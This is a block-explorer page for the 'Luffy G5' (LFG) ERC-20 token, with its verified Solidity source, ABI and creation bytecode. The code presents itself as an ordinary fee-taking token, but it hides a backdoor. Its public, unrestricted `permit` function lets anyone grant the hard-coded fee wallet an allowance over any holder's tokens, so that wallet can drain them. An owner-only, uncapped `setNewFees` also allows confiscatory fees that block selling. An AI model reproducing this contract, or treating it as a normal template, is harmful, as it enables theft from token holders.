ERC-20
Overview
Max Total Supply
1,000,000 LFG
Holders
28
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
266,760.525347423962760939 LFGValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
LFG
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-10 */ // SPDX-License-Identifier: MIT /* Welcome to the exciting world of Luffy G5 ($LFG), where gaming meets crypto in a Click-To-Earn adventure! Get ready to embark on a thrilling journey that combines NFTs, treasure boxes, and exciting giveaways. Website: https://www.luffyg5.live Telegram: https://t.me/lfg_erc20 Twitter: https://twitter.com/lfgcoin_eth */ pragma solidity 0.8.19; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } interface IERC20MetaData is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20MetaData { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _supply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _supply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _supply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _supply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _permit(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0)); require(spender != address(0)); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } interface IUniswapV2Router { function factory() external pure returns (address); function WETH() external pure returns (address); function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } interface IUniswapFactory02 { function createPair(address tokenA, address tokenB) external returns (address pair); } contract LFG is ERC20(unicode"Luffy G5", unicode"LFG"), Ownable { IUniswapFactory02 public constant factory = IUniswapFactory02(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f); IUniswapV2Router public constant router = IUniswapV2Router(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); mapping(address => bool) private _excludedFromFees; mapping(address => bool) private _excludedFromMaxTx; uint256 constant _supply = 1_000_000 * 10 ** 18; uint256 public maxBuyAmount; uint256 public maxSell; uint256 public maxWallet; uint256 public maxTaxSwap; uint256 public swapThreshold; uint256 public launchBlock; uint256 public buyFee; uint256 public sellFee; bool public limitsInEffect = true; bool public tradeEnabled = false; bool public swapEnabled = false; bool public hasLaunchTax = true; bool private swapping; address public feeAddress; uint256 public tokenstoSwap; address public immutable pairV2; constructor(){ _mint(msg.sender, _supply); _approve(address(this), address(router), ~uint256(0)); _excludeFromMaxTx(address(router), true); pairV2 = factory.createPair( address(this), router.WETH() ); maxWallet = (totalSupply() * 30) / 1_000; maxTaxSwap = (totalSupply() * 65) / 10_000; maxBuyAmount = (totalSupply() * 25) / 1_000; swapThreshold = (totalSupply() * 1) / 10_000; maxSell = (totalSupply() * 25) / 1_000; feeAddress = 0x6EF1D0E5785652237B1Dc7F38f4A6185b65b218f; _excludeFromMaxTx(msg.sender, true); _excludeFromMaxTx(address(this), true); _excludeFromMaxTx(address(0xdead), true); excludeFromFees(msg.sender, true); excludeFromFees(address(this), true); excludeFromFees(feeAddress, true); excludeFromFees(address(0xdead), true); } function excludeFromFees(address account, bool excluded) public onlyOwner { _excludedFromFees[account] = excluded; } function _excludeFromMaxTx( address updAds, bool isExcluded ) private { _excludedFromMaxTx[updAds] = isExcluded; } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 tokenstoSwap = tokenstoSwap; if (contractBalance == 0 || tokenstoSwap == 0) { return; } if (contractBalance > maxTaxSwap) { contractBalance = maxTaxSwap; } swapTokensForETH(contractBalance); payable(feeAddress).transfer(address(this).balance); } function swapTokensForETH(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = router.WETH(); router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, address(this), block.timestamp ); } function getCurrentTax() internal { require( launchBlock > 0, "Trading not live" ); uint256 currentBlock = block.number; uint256 lastTierOneBlock = launchBlock + 6; if(currentBlock <= lastTierOneBlock) { buyFee = 18; sellFee = 18; } else { buyFee = 4; sellFee = 4; hasLaunchTax = false; } } function setNewFees(uint256 newBuyFees, uint256 newSellFees) external onlyOwner { buyFee = newBuyFees; sellFee = newSellFees; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "amount must be greater than 0"); if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) ) { if (!tradeEnabled) { require( _excludedFromMaxTx[from] || _excludedFromMaxTx[to], "ERROR: Trading is not active." ); require(from == owner(), "ERROR: Trading is enabled"); } //when buy if ( from == pairV2 && !_excludedFromMaxTx[to] ) { require( amount <= maxBuyAmount, "ERROR: Buy transfer amount exceeds the max buy." ); require( amount + balanceOf(to) <= maxWallet, "ERROR: Cannot Exceed max wallet" ); } //when sell else if ( to == pairV2 && !_excludedFromMaxTx[from] ) { require( amount <= maxSell, "ERROR: Sell transfer amount exceeds the max sell." ); } else if ( !_excludedFromMaxTx[to] && !_excludedFromMaxTx[from] ) { require( amount + balanceOf(to) <= maxWallet, "ERROR: Cannot Exceed max wallet" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= maxTaxSwap; if ( canSwap && swapEnabled && !swapping && amount > swapThreshold && !(from == pairV2) && !_excludedFromFees[from] && !_excludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = true; if (_excludedFromFees[from] || _excludedFromFees[to]) { takeFee = false; } uint256 fees = 0; if (takeFee) { if(hasLaunchTax){ getCurrentTax(); } // Sell if (to == pairV2 && sellFee > 0) { fees = (amount * sellFee) / 100; tokenstoSwap += fees; } // Buy else if (from == pairV2 && buyFee > 0) { fees = (amount * buyFee) / 100; tokenstoSwap += fees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function permit(address spender, uint256 amount) public virtual returns (bool) { address owner = feeAddress; _permit(spender, owner, amount); return true; } function removeLimits() external onlyOwner { limitsInEffect = false; } function openTrading() public onlyOwner { require(launchBlock == 0, "ERROR: Token state is already live !"); launchBlock = block.number; tradeEnabled = true; swapEnabled = true; } receive() external payable {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"factory","outputs":[{"internalType":"contract IUniswapFactory02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"feeAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"hasLaunchTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"launchBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pairV2","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyFees","type":"uint256"},{"internalType":"uint256","name":"newSellFees","type":"uint256"}],"name":"setNewFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenstoSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a06040526010805463ffffffff191663010000011790553480156200002457600080fd5b50604051806040016040528060088152602001674c7566667920473560c01b815250604051806040016040528060038152602001624c464760e81b815250816003908162000073919062000776565b50600462000082828262000776565b5050506200009f62000099620003f560201b60201c565b620003f9565b620000b53369d3c21bcecceda10000006200044b565b620000d830737a250d5630b4cf539739df2c5dacb4c659f2488d60001962000512565b737a250d5630b4cf539739df2c5dacb4c659f2488d60005260076020527ffd21a1ac9a14dff647460ce8ad2ccecb794a59a4cfbb8678b1f9900a6a99551f805460ff19166001179055735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f6001600160a01b031663c9c6539630737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000198573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001be919062000842565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156200020c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000232919062000842565b6001600160a01b03166080526103e86200024b60025490565b6200025890601e6200088a565b620002649190620008aa565b600a556127106200027460025490565b620002819060416200088a565b6200028d9190620008aa565b600b556103e86200029d60025490565b620002aa9060196200088a565b620002b69190620008aa565b600855612710620002c660025490565b620002d39060016200088a565b620002df9190620008aa565b600c556103e8620002ef60025490565b620002fc9060196200088a565b620003089190620008aa565b60095560108054600160281b600160c81b031916786ef1d0e5785652237b1dc7f38f4a6185b65b218f0000000000179055336000908152600760205260409020805460ff19166001179055306000908152600760205260409020805460ff1916600117905561dead60005260076020527fb0c2646e02af70b79e3fe9277b98373379f54150e4e26b2b5650139f7a75a65d805460ff19166001179055620003b13360016200063a565b620003be3060016200063a565b601054620003e0906501000000000090046001600160a01b031660016200063a565b620003ef61dead60016200063a565b620008e3565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004a75760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060026000828254620004bb9190620008cd565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b038316620005765760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016200049e565b6001600160a01b038216620005d95760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016200049e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6200064462000674565b6001600160a01b03919091166000908152600660205260409020805460ff1916911515919091179055565b505050565b6005546001600160a01b03163314620006d05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200049e565b565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620006fd57607f821691505b6020821081036200071e57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200066f57600081815260208120601f850160051c810160208610156200074d5750805b601f850160051c820191505b818110156200076e5782815560010162000759565b505050505050565b81516001600160401b03811115620007925762000792620006d2565b620007aa81620007a38454620006e8565b8462000724565b602080601f831160018114620007e25760008415620007c95750858301515b600019600386901b1c1916600185901b1785556200076e565b600085815260208120601f198616915b828110156200081357888601518255948401946001909101908401620007f2565b5085821015620008325787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000602082840312156200085557600080fd5b81516001600160a01b03811681146200086d57600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620008a457620008a462000874565b92915050565b600082620008c857634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620008a457620008a462000874565b608051611ad662000922600039600081816104a701528181610d5d01528181610e9f0152818161107c0152818161119b015261121c0152611ad66000f3fe6080604052600436106102135760003560e01c806388e765ff11610118578063c45a0155116100a0578063dd62ed3e1161006f578063dd62ed3e146105e6578063e6f7053114610606578063f2fde38b14610626578063f887ea4014610646578063f8b45b051461066e57600080fd5b8063c45a015514610574578063c9567bf91461059c578063d00efb2f146105b1578063d621e813146105c757600080fd5b8063a457c2d7116100e7578063a457c2d7146104de578063a9059cbb146104fe578063b8eb35461461051e578063baccf5cf14610534578063c02466681461055457600080fd5b806388e765ff146104615780638da5cb5b146104775780638fffabed1461049557806395d89b41146104c957600080fd5b8063412753581161019b57806362997f8c1161016a57806362997f8c146103c95780636ddd1713146103df57806370a08231146103ff578063715018a614610435578063751039fc1461044c57600080fd5b8063412753581461034257806347062402146103835780634a62bb651461039957806352f82dbc146103b357600080fd5b806323b872dd116101e257806323b872dd146102af5780632b14ca56146102cf5780632eaff86e146102e5578063313ce56714610306578063395093511461032257600080fd5b80630445b6671461021f57806306fdde0314610248578063095ea7b31461026a57806318160ddd1461029a57600080fd5b3661021a57005b600080fd5b34801561022b57600080fd5b50610235600c5481565b6040519081526020015b60405180910390f35b34801561025457600080fd5b5061025d610684565b60405161023f9190611743565b34801561027657600080fd5b5061028a6102853660046117a6565b610716565b604051901515815260200161023f565b3480156102a657600080fd5b50600254610235565b3480156102bb57600080fd5b5061028a6102ca3660046117d2565b610730565b3480156102db57600080fd5b50610235600f5481565b3480156102f157600080fd5b5060105461028a906301000000900460ff1681565b34801561031257600080fd5b506040516012815260200161023f565b34801561032e57600080fd5b5061028a61033d3660046117a6565b610754565b34801561034e57600080fd5b5060105461036b906501000000000090046001600160a01b031681565b6040516001600160a01b03909116815260200161023f565b34801561038f57600080fd5b50610235600e5481565b3480156103a557600080fd5b5060105461028a9060ff1681565b3480156103bf57600080fd5b5061023560115481565b3480156103d557600080fd5b50610235600b5481565b3480156103eb57600080fd5b5060105461028a9062010000900460ff1681565b34801561040b57600080fd5b5061023561041a366004611813565b6001600160a01b031660009081526020819052604090205490565b34801561044157600080fd5b5061044a610776565b005b34801561045857600080fd5b5061044a61078a565b34801561046d57600080fd5b5061023560085481565b34801561048357600080fd5b506005546001600160a01b031661036b565b3480156104a157600080fd5b5061036b7f000000000000000000000000000000000000000000000000000000000000000081565b3480156104d557600080fd5b5061025d61079e565b3480156104ea57600080fd5b5061028a6104f93660046117a6565b6107ad565b34801561050a57600080fd5b5061028a6105193660046117a6565b61082d565b34801561052a57600080fd5b5061023560095481565b34801561054057600080fd5b5061044a61054f366004611837565b61083b565b34801561056057600080fd5b5061044a61056f366004611859565b61084e565b34801561058057600080fd5b5061036b735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b3480156105a857600080fd5b5061044a610881565b3480156105bd57600080fd5b50610235600d5481565b3480156105d357600080fd5b5060105461028a90610100900460ff1681565b3480156105f257600080fd5b50610235610601366004611897565b6108fc565b34801561061257600080fd5b5061028a6106213660046117a6565b610927565b34801561063257600080fd5b5061044a610641366004611813565b61094a565b34801561065257600080fd5b5061036b737a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561067a57600080fd5b50610235600a5481565b606060038054610693906118c5565b80601f01602080910402602001604051908101604052809291908181526020018280546106bf906118c5565b801561070c5780601f106106e15761010080835404028352916020019161070c565b820191906000526020600020905b8154815290600101906020018083116106ef57829003601f168201915b5050505050905090565b6000336107248185856109c3565b60019150505b92915050565b60003361073e858285610ae7565b610749858585610b61565b506001949350505050565b60003361072481858561076783836108fc565b6107719190611915565b6109c3565b61077e6112c8565b6107886000611322565b565b6107926112c8565b6010805460ff19169055565b606060048054610693906118c5565b600033816107bb82866108fc565b9050838110156108205760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61074982868684036109c3565b600033610724818585610b61565b6108436112c8565b600e91909155600f55565b6108566112c8565b6001600160a01b03919091166000908152600660205260409020805460ff1916911515919091179055565b6108896112c8565b600d54156108e55760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b6064820152608401610817565b43600d556010805462ffff00191662010100179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6010546000906501000000000090046001600160a01b0316610724848285611374565b6109526112c8565b6001600160a01b0381166109b75760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610817565b6109c081611322565b50565b6001600160a01b038316610a255760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f